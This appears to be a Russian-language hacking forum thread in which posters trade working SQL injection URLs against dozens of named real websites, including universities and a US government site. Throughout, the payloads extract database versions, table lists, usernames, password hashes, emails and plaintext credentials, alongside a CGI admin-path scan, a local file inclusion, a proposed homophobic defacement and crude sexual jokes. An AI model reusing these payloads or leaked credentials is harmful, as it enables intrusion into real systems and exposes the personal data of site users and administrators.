http://www.protopor.gr/index.php?shownews=-1/**/union/**/select/**/0,1,2,3,4,5,concat(uid,char(20),username,char(20), password),7,8,version(),10,user(),12,13,14,15,16,1 7+from+users/*

http://www.party-san.de/openair/festival/index.php?shownews=-1'/**/union/**/select/**/0,concat(id,char(20),username,char(20),pwd,ch

ar(20),email),2,concat(version(),char(20),database (),char(20),user()),4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22+from+pnew

s_pfuser/*&lang=de

sql mssql

http://www.gastromag.ru/newsgastro/view_archive.asp?r=6&id=-1'+or+1=@@version%20--


Вытащил имена таблиц, и уже столбцы.
('column')


Вытащил имена таблиц, и солбцов)
ИМЕНА ТАБЛИЦ СТОЛБЦИ В ТАБЛИЦЕ
'infonews' ('IdRec','Header','Body','Body1','IdRazd','IdPodra zdel','arhiv','Dat')
'infonews_ext' ('idnews','archeader','source','author','newsdate' ,'photographer','AdminComment')
'Podrazdel' ('idrec','idrazd','Header')
'Razdel' ('idrec','header','GroupHeader','showsource','Show Author','ShowNewsDate')
'Subscribers' ('email','id','lastname','firstname','secondname', 'birthdate','sex','country','Town','scope')
'sysconstraints' ('id','constid','colid','spare1','status','actions ','error')
'syssegments' ('segment','name','status')
't_morebody' ('idnews','MoreBody','n') /*Может нам и интересне.
'Temp' ('Email','id','regdate')
'view_info_news' ('idrec','header','body','body1','idrazd','idpodra zdel','arhiv','dat','archeader','source','author', 'newsdate','Photographer','AdminComment','ShowSour ce','ShowAuthor','ShowNewsDate')
'Vote' ('idrec','checked','dat','ip')
'vote1' ('IdRec','checked','Dat','ip')
'vote2' ('IdRec','checked','Dat','ip')
'VoteOld' ('IdRec','checked','Dat','ip')
'foo' ('myret')


Буду осматривать все((( так как бональнова ,user,password нету(

Име базы текущего usera: 'GSnews'
Может админка не в этой базе?
А может что login и pass вобще не хранится в mssql, или нету прав на просмотр имени этой таблице?

http://spa.american.edu/ccps/pages.php?ID=-20+union+select+1,2,3/*

http://www2a.cdc.gov/phlp/dailynews/default.asp?specific=1%20or%201=(SELECT+TOP+1+TABL E_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_ NAME+NOT+IN+('PHLP_tblBibPub','PHLP_tblBib','CoopA gree_Projects','EPRP_PRGrants','EPRP_TBLGLOBAL','i nvTBLCDOrder','EPRP_TBLLOGINS','invTBLCONTACT','Ca mpus','CoopAgree_Award','CoopAgree_ContactProject' ,'CoopAgree_ContactReviewerPanel','CoopAgree_Conta cts','CoopAgree_ContactSAE','CoopAgree_Institution ','CoopAgree_InstitutionOLD','CoopAgree_PanelConta ct','CoopAgree_Pep','CoopAgree_PepContact','CoopAg ree_ProjectSAE','CoopAgree_PrtControl','CoopAgree_ PrtControlParms','CoopAgree_ReviewerPanel','CoopAg ree_ReviewerPanel','CoopAgree_Role','CoopAgree_SAE ','CoopAgree_Security','DPHSDRTask_Clearance','DPH SDRTask_Divisions','DPHSDRTask_Meeting','DPHSDRTas k_POC','DPHSDRTask_Projects','DPHSDRTask_ProjectSt atus','DPHSDRTask_ProjectTypes','dtproperties','ep rpTBLCONTACT','HelpDeskAdmins','ITSO_VC_SURVEY','J ohnNews','LPHPRCI_UserListing','LU_Branch','LU_Div ision','LU_EmailGroup','LU_Request','MGMT_Develope rs','MGMT_Divisions','MGMT_Projects','MGMT_Project Status','MGMT_ProjectTypes','OD_TBLLOGINS','ODTASK _Clearance','ODTask_Divisions','ODTASK_Meeting','O DTask_POC'))--

http://pr.utk.edu/news/article.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FRO M+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+I N+('HS_TRANSACTION_LOG','dtproperties','RELEASE_UT C','releaseTBL','sysconstraints','syssegments','tn tnews','vw_Release','vwDROP','vwDROP2','vwEXPIRE', 'vwEXPIREDATE','vwTODAY','vwUTM','vwVET','vwWeek') )--

http://idl63.ils.unc.edu/chirag/Energy/showmetadata.php?video_id=-8949+union+select+1,2,3,4,5,6,7,table_name,9,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.tables+limit+42,1/*

http://www.fwbusinesspress.com/display.php?id=-6716+union+select+1+from+admin/*

http://www.graysofwestminster.co.uk/newsitem.php?id=-35+union+select+1,AES_DECRYPT(AES_ENCRYPT(version( ),0x71),0x71),3,4,5,6/*

http://www.stjerome.co.uk/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37/*&doctype=Periodicals&section=1

http://www.pluralism.org/news/article.php?id=-2557+union+select+1,user(),3,4,5,6,7,8,9,10,versio n(),database(),13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42/*

http://www.dysgenicrecords.com/release.php?id=-19+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.coopersurgical.com/csweb/product_100.asp?category_id=1%20or%201=(SELECT+TOP +1+last_name+FROM+csweb_user)--

имеется колонки: 'user_id','customer_number','unvalidated_customer_ number','date_created','first_name','middle_initia l','last_name','title','telephone_number','fax_num ber','email_address','password','marketing_info_id ','email_reminder

http://www.peakdistrictonline.co.uk/content.php?categoryId=1804+order+by+100/*

http://www.tartybikes.co.uk/product.php?id=-10008+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,table_name,20,21+from+information_sc hema.tables+limit+47,1/*

http://www.magic-pony.com/product.php?id=-2384+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*&category=western

http://www.toddlepembrokeshire.com/toddle-category.asp?id=1%20or%201=(SELECT+TOP+1+cast(user name+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+n varchar)%2B%27%3A%27%2Bcast(email+as+nvarchar)+fro m+Customersreal+where+CustomerID=150)--

http://www.toddlepembrokeshire.com/toddle-category.asp?id=1%20or%201=(SELECT+TOP+1+cast(user name+as+nvarchar)%2B%27%3A%27%2Bcast(password+as++ nvarchar)+from+users)--
carl:wrex

http://www.toddlepembrokeshire.com/toddle-category.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_NAM E+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+ NOT+IN+('hayleybookings','CancelShop2008a','hayley charges','beachinfotest','ModCottages2009','ModCot tages2008new','ModCottages2008a','cartitem','Booki ngNew2001','ModCottages','ModBooking2009','coastal _offers','Clusters','ModBooking2008new','ClusterCo ttages','monthof','BookingNew2006a','ClientCare200 9','OwnerNew','BookingNew2007','ModBooking2008a',' OwnerNew2001','BookingNew2007old','users','ClientC are2008a','OwnerNew2002','BookingNew2008','CancelB ooking2008a','ClientCare2007','OwnerNew2003','Book ingNew2008a','clent_care','OwnerNew2004','ModBooki ng2007','OwnerNew2005','BookingNew2009','sin','loc ation','OwnerNew2006','CCPHomePage','CottageMaint2 009','CottageMaint2008a','CottageMaint2007','Owner New2007old','CancelBooking2009','Customersreal','e mailreport','guestbook','emailcontent','CottagesNe w2008new','ecards','dogs','D99_Tmp','OwnerNew2009' ,'Caretaker2007','picofmonth','Caretaker2007a','cu stomers','PricesNew2007','Caretaker2007b','PricesN ew2008a','LateDeals','Caretaker2008','Caretaker200 8a','PricesNew2009','Caretaker2008b','CancelBookin g2008new','Pricing2000','Caretaker2009','Pricing20 01','Caretaker2009a','Pricing2002','Caretaker2009b ','pricing2003','pricing2004','celebrations','pric ing2005','Charges','pricing2006','Charges2001','pr icing2006a'))--&category=9

http://www.magicbeard.com/view.php?id=-35'+union+select+1,2,3,4,5,6,7,8,9/*

http://www.cz-usa.com/product_detail.php?id=-74+union+select+1,2,3,4,5,6/*

http://www.solarstyleinc.com/detail.php?ID=-64+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

http://edgartownboardoftrade.com/php/events2.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23/*

http://www.menupix.com/boulder/restaurants.php?id=-700105+union+select+1,2,3/*

http://www.airsideshop.com/product.php?id=-298+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 14,14,14,14,14,14/*

http://www.pharmaexpress.us/resource/products/orderInfoForm.asp?ID=1+or+1=(SELECT+TOP+1+TABLE_NA ME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME +NOT+IN+('TABLE_PRIVILEGES','TABLES','SCHEMATA','O rderSearchedWords','KNUEPPELS_Reorder','surfmedpro ducts','OrderProductsCOPY','Careers','Sheet1$','Or derCustomers','tblPolls','ArticleTypes','tblConfig uration','lifeplus','lifplusCLEAN','MotionWhatsNew ','MotionNews','MotionLogin','OrderInsuranceApp',' MalEmails','OrderMfgs','OrderProducts','Audit','Ar ticleCategories','StateNames','OrderReceipts','Art icleUploads','OrderOwnerProducts','OrderLIreorder' ,'Deliveries','OrderCategory','OrderBasket','Order Owners','AppointmentRegistration','Aronson_Referra l_Form','Articles','PollTakers','Polls','PollQuest ions','REFERENTIAL_CONSTRAINTS','CHECK_CONSTRAINTS ','UnityHME_news','CONSTRAINT_TABLE_USAGE','CONSTR AINT_COLUMN_USAGE','VIEWS','AEROFLOW_Forms','Order ProductsNEW','VIEW_TABLE_USAGE','VIEW_COLUMN_USAGE ','GalleryTopics','ResFormLineItems','GalleryPhoto s','syssegments','sysconstraints','sysalternates', 'ValidUsers','KEY_COLUMN_USAGE','ResFormCustomers' ,'TankMasterTanks','TankEvacuation','OrderSubmitTo Loc','dtproperties','TankAnalyzerCheck','!SiteOwne rs','TankAudit','TankLocation','TreeList_Tmp','Tan kValidUsers','OrderInfoRequests','TankDetails','Re sFormProducts','TABLE_CONSTRAINTS','COLUMNS','COLU MN_DOMAIN_USAGE','LINCOLN_ReferralForm','COLUMN_PR IVILEGES','DOMAINS','DOMAIN_CONSTRAINTS','UnityHME _news_categories'))--

http://dma.ucla.edu/gallery/faculty_gallery.php?ID=-101+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20/*

Прошу помаши в проведение sql mssql,
Вытащил имена таблиц, но тармазнулcя на колонках.
С mssql в первые, не понимаю как подбираются ('column')






------------Модератор---------------
Просьба не удалять если не кто не проявит желания отредактирую.
Статьи для кого пишут?
http://www.inattack.ru/article/275.html
http://www.inattack.ru/article/163.html
.. поиск по форуму находится слева

erostory.ru
http://www.erostory.ru/list.php?g=%CB%E5%F1%E1%E8%FF%ED%EA%E8&link=-1+union+select+1,concat_ws(0x3a,VERSION(),DATABASE (),USER()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8+FROM+erostory_db.autors+LIMIT+0,1--+

Порнуха в текстовом виде xD.

Интересные запросы к интересным таблицам:
http://www.erostory.ru/list.php?g=%CB%E5%F1%E1%E8%FF%ED%EA%E8&link=-1+union+select+1,concat_ws(0x3a,ID,name,email,city ,url,date,pass,status,ip),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18+FROM+erostory_db.autors+LIMIT+0,1--+

Логиниться с этими данными в http://www.erostory.ru/autor.php .

http://www.erostory.ru/list.php?g=%CB%E5%F1%E1%E8%FF%ED%EA%E8&link=5082+union+select+1,concat_ws(0x3a,ID,pass),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+FROM+erost ory_db.adminip--+

http://www.erostory.ru/list.php?g=%CB%E5%F1%E1%E8%FF%ED%EA%E8&link=5082+union+select+1,concat_ws(0x3a,login,pass ,status),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+ FROM+erostory_db.links_admins--+

Как попасть в админку: хз. Просканил CGI-сканером Pelmeshko:

---------------------------------------------
[i] Starting scan.
[i] Start time: Sat Jun 7 19:49:05 2008
[i] Targer host/path: erostory.ru/
[i] Targer port/SSL: 80 | 0
---------------------------------------------
404 Probe request to server. Server answering with HTTP/1.1 404 Not Found
Server Headers:
Server: Apache/2
Database Cgi's:
Rootdir found: erostory.ru/cgi-bin/
Database Common:
Rootdir found: erostory.ru/
[403] Found: erostory.ru/admin/
[403] Found: erostory.ru/administration/
[403] Found: erostory.ru/admins/
[403] Found: erostory.ru/cgi-bin/
[302] Found: erostory.ru/config/
[403] Found: erostory.ru/error/
[403] Found: erostory.ru/images/
[403] Found: erostory.ru/img/
[403] Found: erostory.ru/picture/
[200] Found: erostory.ru/robots.txt
[403] Found: erostory.ru/.htaccess
[403] Found: erostory.ru/.htpasswd
[403] Found: erostory.ru/.htaccess~
[403] Found: erostory.ru/.htpasswd~
[403] Found: erostory.ru/admin-a/
[403] Found: erostory.ru/server-status/
---------------------------------------------
Scan finished at Sat Jun 7 19:53:28 2008. Total 817 objects scanned
---------------------------------------------


Куча админок, но все 403 Forbidden. Может админа по IP-адресу определяют, я хз...

http://www.flirtanica.ru/articles1.php?id=-1+union+select+1,version(),3,4,user()/*

version() 4.1.22
user() flirtani@localhost

не стал подбирать колонки, не люблю 4-ую версию за это :-(
----------------------------------
http://www.webapplist.com/category.php?id=-1'+union+select+1,2,3,4/*

а здесь не смог подобрать кол-во колонок, дошел до 100 но все равно: The used SELECT statements have a different number of columns

посмотрите если кому интересно...

http://www.ittconference.ie
http://www.ittconference.ie/main.php?ID=-1+union+select+1,concat_ws(0x3a,username,password, email),3,4,5,6,7+from+itt_reviewer+limit+0,1/*

http://www.curacaodolphintherapy.com/
http://www.curacaodolphintherapy.com/main.php?id=-1+union+select+1,2,concat_ws(0x3a,id,username,pass word,admin),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24+from+users+limit+0,1/*

http://www.eicta.org/index.php?id=32&id_article=93'
http://www.paintball.ru/next.php?id=999919+union+select+1,2,VERSION()
http://www.comingsoon.net/films.php?id=1+union+select+VERSION()
http://www.fcdynamo.ru/players.php?id=-1'+union+select+table_name+from+information_schema .tables+limit+59,1/*
http://expressorder.ru/forum/message.php?id=11'
http://www.hpol.org/record.php?id=72
http://www.mymaika.ru/catalog.php?id=181'
http://www.fm.gov.lv/index.php?id=8'
http://www.mtas.ru/second.php?ID=-243+union+select+1/*
http://opel.avto-city.ru/catalog.php?id=-3+union+select+1,2,3,4,5,6,7/*
http://koleso.topof.ru/testing_info.php?id=-9+union+select+1,2,column_name,4,5,6,7+from+inform ation_schema.columns+where+table_name='admins'+lim it+1,1/*
http://koleso.topof.ru/testing_info.php?id=-9+union+select+1,2,concat(admin_name,0x3a,admin_pa ssword),4,5,6,7+from+admins+limit+5,1/*
http://www.flirtanica.ru/articles1.php?id=-33+union+select+1,2,3,4,VERSION()/*
http://www.rudtp.ru/articles.php?id=44+union+select+1,2,3,4,5,6,7/*
http://www.acte.org/resources/press_release.php?id=-284+union+select+1,2,3,4,5,6,7,8,9/*
http://www.analisi.ru/regulations.php?id=-3+union+select+1,2,3,4/*
http://ansijournals.com/3/c4p.php?id=1'&theme=3&jid=itj
http://www.bmoca.org/artist.php?id=-74+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25/*
http://www.chinesejetpilot.com/index.php?ID=-202+union+select+1,2,3,4,5,6/*
http://www.avtosreda.ru/new/meropr.php?id=-16+union+select+1/*
http://zoorinok.com.ua/razdel/&podrazdel=-306+union+select+1,VERSION(),3,4,5,6/*
================================================== =============
lastsmile,я твою первую скулю давненько нашел,но ты оказался тут первым=)

www.glaad.org

Уязвимость:

http://www.glaad.org/media/resource_kit_detail.php?id=3457'

Колонки:

http://www.glaad.org/media/resource_kit_detail.php?id=-3457+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6, 7,8,9,0

Информация о базе:


glaad_www_1
4.0.12-standard
glaad@localhost

www.suter.ru

Сайт российских сутенеров :)

http://www.suter.ru/index.php?ind=3&menu=3&id_tablt=6+AND+1&table=cras
http://www.suter.ru/index.php?ind=3&menu=3&id_tablt=6+AND+1<ascii(substring((SELECT+table_name+FROM+informatio n_schema.tables+limit+63,1),1,1))&table=cras
http://www.suter.ru/index.php?ind=3&menu=3&id_tablt=6+AND+1<ascii(substring((SELECT+column_name+FROM+informati on_schema.columns+WHERE+table_name+like+'sites'+li mit+1,1),1,1))&table=cras

VERSION() - 5.1.11-beta
USER() - xstars_u@localhost
DATABASE() - db_xstars_u


Структура таблиц
**************************
agent
--------------------------
name
cvet
**************************
attak
--------------------------
ip
k-vo
interval
adres
site
otprmail
**************************
buf
--------------------------
ip
vrem
adres
site
**************************
clicks
--------------------------
ip
banner_id
time
referer
**************************
club
--------------------------
name
name_en
opisanie
opisanie_en
photo
link
data
block
**************************
sessions
--------------------------
uid
expire
ip
**************************
sites
--------------------------
site
log
posl
poslstr
id
name
**************************
users
--------------------------
name
email
transfer
phone
site
password
**************************
devk
--------------------------
new
name
name_en
prioritet
rate
id_goroscop
razmer
rost
ves
grud
vozrast
id_gorod
id_metro
adres
mail
club
text
text_en
hour_app
hour2_app
night_app
hour_out
hour2_out
night_out
sutki
valut
photosmall
time_block
data
block
prosmotr
penis
kto
chya
blockind
**************************
dnevniky
--------------------------
nazv
smtext
text
links
date
**************************
foto
--------------------------
id_devk
foto
**************************
gorod
--------------------------
name
name_en
**************************
goroscop
--------------------------
name
name_en
**************************
message
--------------------------
r_id
name
subject
msg
email
m_date
ip
**************************
message1
--------------------------
id_devk
nick
mess
data
**************************
message_en
--------------------------
r_id
name
subject
msg
email
m_date
ip
**************************
metro
--------------------------
name
name_en
**************************
param
--------------------------
mned
ened
kned
pned
transned
**************************
podrugy
--------------------------
podruga_id
**************************
poll_alternatives
--------------------------
alternative
votes
id
**************************
polls
--------------------------
question
active
dateactive
votes
**************************
polz
--------------------------
login
pass
mail
balance
**************************
site_news
--------------------------
nazv
text
date
**************************
soedcp
--------------------------
id_club
**************************
soeddp
--------------------------
id_devk
**************************
suter_cras
--------------------------
name
block
**************************
suter_crast
--------------------------
id_cras
nazv
text
date
**************************
suter_lgesotr
--------------------------
block
name
text
foto1
foto2
foto3
gorod
ip
datetime
**************************
suter_nazam
--------------------------
name
block
**************************
suter_nazamt
--------------------------
id_nazam
nazv
text
date
**************************
suter_psevdoklienty
--------------------------
name
ip
mail
telephone
telephone2
mbtelephone
mb2telephone
name_ps
adres
avto
soobsh
date
**************************
suter_rassilk
--------------------------
mail
ip
date
**************************
suter_urb
--------------------------
name
block
**************************
suter_urbt
--------------------------
id_urb
nazv
text
date
**************************
svaz_uslug
--------------------------
id_usl
**************************
telephone
--------------------------
id_club
operator
**************************
telephoneind
--------------------------
tel
operator
**************************
uslugy
--------------------------
name
name_en
kto
**************************
video
--------------------------
id_devk
namev
data
**************************
x_news
--------------------------
nazv
nazv_en
smtext
smtext_en
text
text_en
img
date
**************************

proretail.com.ua


http://proretail.com.ua/kont.php?c_i=-1+union+select+1,2,TABLE_NAME,4,5,6,7+FROM+INFORMA TION_SCHEMA.TABLES/*



http://proretail.com.ua/kont.php?c_i=-1+union+select+1,2,concat_ws(0x3a,login,pas,mail), 4,5,6,7+from+user/*



http://media-intelligence-partners.com/briefings.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8/*

pastebin.ru
Случайно найдена Chaak`ом и мной..

постим что-то типа кода (не указывая имя):

'
U0NSSVBUX05BTUU=','MS4x','Yg==','eQ==','IA==','RA= =','WA==','IA=='
,-union+select+1,2'

резалт:
Query failure: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1,2\' ?>',294388)' at line 2
insert into pastebin (poster, posted, code, parent_pid) values ('Гость',now(),'',294388);

http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,null,concat_ws(0x3a,user,pas sword),version(),user(),8,9,10,11,12,13,14,15,1
6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38+from+users/*

http://www.autometaldirect.com/content.php?page=-118+union+select+1,2,concat_ws(0x3a,useremail,user password),4,null,6,7,8,9,10,11,12
+from+user/*

http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,null,concat_ws(0x3a,user,pas sword),version(),user(),8,9,10,11,12,13,14,15,1
6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38+from+users/*


=(( многоразовый боян.

юзай
http://filefront.jino-net.ru/sql.html

nexia.com
http://www.nexia.com/country.php?id=-2+union+select+1,2,3,4,5,concat_ws(0x3,version(),u ser(),database()),7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
4.1.20-community-ntnexiausr@localhostnexia
http://www.nexia.com/country.php?id=-2+union+select+1,2,3,4,5,concat(username,0x3,passw ord),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33+from+tmembers+lim it+0,1/*
estudiogior5ar

Pogoda.ua. Погода в Украине и мире. Погода в Киеве. Прогноз погоды на 10 дней


http://www.pogoda.ua/index.php?id=-1+union+select+1,concat_ws(0x3a,login,password,ema il),3,4,5+from+users+limit+0,1/*


test:test:test@localhost.com

globaleconomicgovernance.org
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,concat_ws(0x3,version(),user(),da tabase()),3,4,5,6,7/*

5.0.45-logdbo158065722@212.227.118.42db158065722
http://www.globaleconomicgovernance.org/research.php?id=-2+union+select+1,unhex(hex(concat_ws(0x3,userlogin name,userpassword))),3,4,5,6,7+from+upload_users/*
test_user32570e9ad6d773db0af65ac057c5e4a7f

Как поеметь Диму Билана ?(www.bilandima.ru)
А вот и ответ:
способ номер раз : анальный =)
SQL #1
Требует рeгу.
http://www.bilandima.ru/friendsclub/userinfo.php?id=0'+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,concat_ws(0x3a ,version(),database(),user()),23,24,25,26,27,28/*
Способ номер два: анальный с прибамбасом =)
SQL#2
http://www.bilandima.ru/friendsclub/

Электронная почта
E-mail

Пароль
Password

подставляем " ' " и емеем

Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''')' at line 1

Cпособ #3
Емеем в рот =)

(Local include)

http://www.bilandima.ru/html/promofoto.php?p=../../fotoalbum/fotos/209_oslo/001s.jpg%00

И незабудь резину (Proxy)

Web-defence.ru
Ахха, надо дефейсануть этот сайт и написать от Отара Кушанашвили:
Рудковская гений. Билан - Лучший певец. Только ПИДАРАЗ! :D :D :D

torg.ua
http://www.torg.ua/board_podrobno.php?details=2261+AND+1=1/*
http://www.torg.ua/board_podrobno.php?details=2261+AND+1=2/*
Смотрите разницу :). Инъекция вывода не имеет, но можно посимвольно брутить, сбрутил версию:
-> Try 30 .. 70 -> Char > 50
-> Try 50 .. 70 -> Char < 60
-> Try 50 .. 61 -> Char < 55
-> Try 50 .. 56 -> Char < 53
-> Try 50 -> NO =(
-> Try 51 -> NO =(
-> Try 52 -> FOUND!
-> Ascii: 52
-> Char: 4

Ничего хорошего, четверка :(

tribeca.org
http://www.tribeca.org/content.php?id=-2'+union+select+1,concat_ws(0x3,version(),user(),d atabase()),3,4,5,6,7,8/*
5.0.24a-standard-logtribeca_user@apache2-blow.skoda.dreamhost.comtribecaorgnew
http://www.tribeca.org/content.php?id=-2'+union+select+1,concat(admin,0x3,admin_pass),3,4 ,5,6,7,8+from+site_admin/*
adminadmin

mogadishni.com
http://www.mogadishni.com/site/artist.php?id=-2+union+select+concat_ws(0x3,version(),user(),data base()),2,3,4,5/*
4.1.20-community-ntchr@localhostmogadishni
http://www.mogadishni.com/site/artist.php?id=-2+union+select+concat_ws(0x3,id,email,phone),2,3,4 ,5+from+contact+limit+2,1/*
4loeland@mogadishni.com+45 32543535

rfbd.ru - Телефонные Базы Данных г. Москва, Телефонные Справочники г. Москва, Паспортные Базы Данных г. Москва


http://rfbd.ru/info.php?id=402&rubrika=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase())/*


5.0.37-standard-log:a1rfbd_guest@localhost:a1rfbd_ric_datebase


http://rfbd.ru/info.php?id=402&rubrika=-1+union+select+1,table_name+from+information_schem a.columns+where+column_name=0x70617373776f7264/*

_cms_users


СоюзКредит.ру — быстрый денежный кредит, ипотека и автокредит

http://www.souscredit.ru/?p=4&cat=-1+union+select+1,concat_ws(0x3a,name,login,pass,ma il),3,4+from+users+where+id=1/*

admin:llirik:kirill:admin@souscredit.ru

На сладенькое немного .edu
http://www.ub.edu/crai/pharmakoteka/registre.php?id=-11+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

http://www.cpd.usu.edu/asset.php?id=-111+UNION+SELECT+1,table_name,table_name,table_nam e,5,6+from+information_schema.tables+limit+15,1/*

http://caxton.emich.edu/guide/guide.php?id=-111+UNION+SELECT+1,2,VERSION(),4,5,6,7,8,9/*

http://math.ucsd.edu/people/profile.php?id=-111+UNION+SELECT+VERSION()/*

http://www.stots.edu/article.php?id=-111+UNION+SELECT+1,2,VERSION(),4,5,6,7,8/*

http://www.whitleyaward.org/display.php?id=-75+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13, 14,15,16,17 ,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33/
*

http://www.comicstriplibrary.org/display.php?id=-606+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,1 5,16,17,18,19/*

http://www.heroplay.com/features/articles/display.php?id=-27+union+select+1,2,3,version(),5,6,7,8,9,10 ,11,12,13,14 ,15,16,17 ,18,19,20,21/*

http://www.isdci.org/display.php?ID=-36+union+select+1,2 ,v ersi on(),4,5,6/*

http://www.noborder.org/actionday2005/display.php?id=-334+union+select+1,2,version(),4,5,6,7,8,9 ,10,11,12 ,13,14,1 5,16,17,18,19,20,21,2 2,23,24,25,26,27/*

http://www.cageprisoners.com/page.php?id=-3+union+select+1,2,concat_ws(0x3a,id,username,pass word,email,level,last_login)+from+admins+limit+0,1/*
5.0.22
admin:NZnlqRHG2GH8RHmHnShvb/
но так как такого хеша , по моему, нету поэтому вот вариации хешей всех админов при добавке $1$$ или $apr1$$ md5(Unix) или md5(APR) соответственно

$1$$M3TkIDtI14ob4MPCg42FO1
$1$$lw5UAzT2SsIuEfwZqZ45Z1
$1$$1xIcgmF403/oVi4lWT/mp/
$1$$MY4aW1u.6HE0oCMmBPGbS0
$1$$LhrLb2O5uxhivwYrDPGSj1
$1$$Eg92rdb3Ur7jmxG/Ip5na/
$1$$lEiUe5NQPjWHfblYeq8np/
$1$$eoqd8CPMgb77qCBgf4hA2/
$1$$NZnlqRHG2GH8RHmHnShvb/

$apr1$$M3TkIDtI14ob4MPCg42FO1
$apr1$$lw5UAzT2SsIuEfwZqZ45Z1
$apr1$$1xIcgmF403/oVi4lWT/mp/
$apr1$$MY4aW1u.6HE0oCMmBPGbS0
$apr1$$LhrLb2O5uxhivwYrDPGSj1
$apr1$$Eg92rdb3Ur7jmxG/Ip5na/
$apr1$$lEiUe5NQPjWHfblYeq8np/
$apr1$$eoqd8CPMgb77qCBgf4hA2/
$apr1$$NZnlqRHG2GH8RHmHnShvb/

http://www.hardvision.ru
Сама уязвимость:
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,user(),3/*
login: foto
database: hardvision
version:5.0.45-5-log
Мой первый пост на форуме =)

http://www.hrv-club.ru/articles.php?m=opit'+UNION+SELECT+1,user,3,4,5,6,7 ,8+FROM%20mysql.user/*
http://www.hrv-club.ru/articles.php?m=opit'+UNION+SELECT+1,password,3,4,5 ,6,7,8+FROM%20mysql.user/*
http://www.hrv-club.ru/articles.php?m=opit'+UNION+SELECT+1,concat_ws(0x3A ,table_schema,TABLE_NAME),3,4,5,6,7,8+FROM%20INFOR MATION_SCHEMA.TABLES/*

А вот к форумной бд хз как подойти. Форум ломается обычным сплоитом и админы этого форума присутсвуют еще на 10 других, и везде админка форума защищена какойто дрянью... Мне кажется это "сеть" форумов :confused:
Если вдруг комуто очень надо будет, дам админский пасс, чтобы не ломились непонятные люди на форум и неписали какие они крутые кулхацкеры =/

Один очень симпатичный еврейский институт(никакой розьни :D )

www.shalom.edu.au
Домен в зоне .edu (образование)

Бажный линк:
http://www.shalom.edu.au/contentPage.php?id=-139+union+select+1,2,version(),4/**/&parentId=1'
До конца доводить не решил(влом),но базовые данные выложу:

база данных: shalom_shalom (уже смешно :) )
юзер: shalom_limmudozD@localhost (шас описаюсь )))
версия: 4.1.22-standard-log
Между прочим у них очень красивые фотки и СОВСЕМ не фильтрующиея знаки..

http://www.hardvision.ru
Сама уязвимость:
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,user(),3/*
login: foto
database: hardvision
version:5.0.45-5-log
Мой первый пост на форуме =)
хоть и твой первый пост .. но ты должен помнить ! что скулю надо раскручивать если есть такая возможность ! (5ая версия так что тут даже думать нечего !)

================================================== ============
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,username,passwor d),3+from+hvbb.user+limit+6111,1/*
6к юзеров от булки - md5(md5($pass).$salt)

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passwd),3+f rom+foto.admin_table/*
digit:30bf4fb4729f382ca2010fd445f1796d:mityap123

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passw,kode) ,3+from+foto.users+limit+0,1/*
юзерские логины-пароли от сервиса www.getfoto.ru

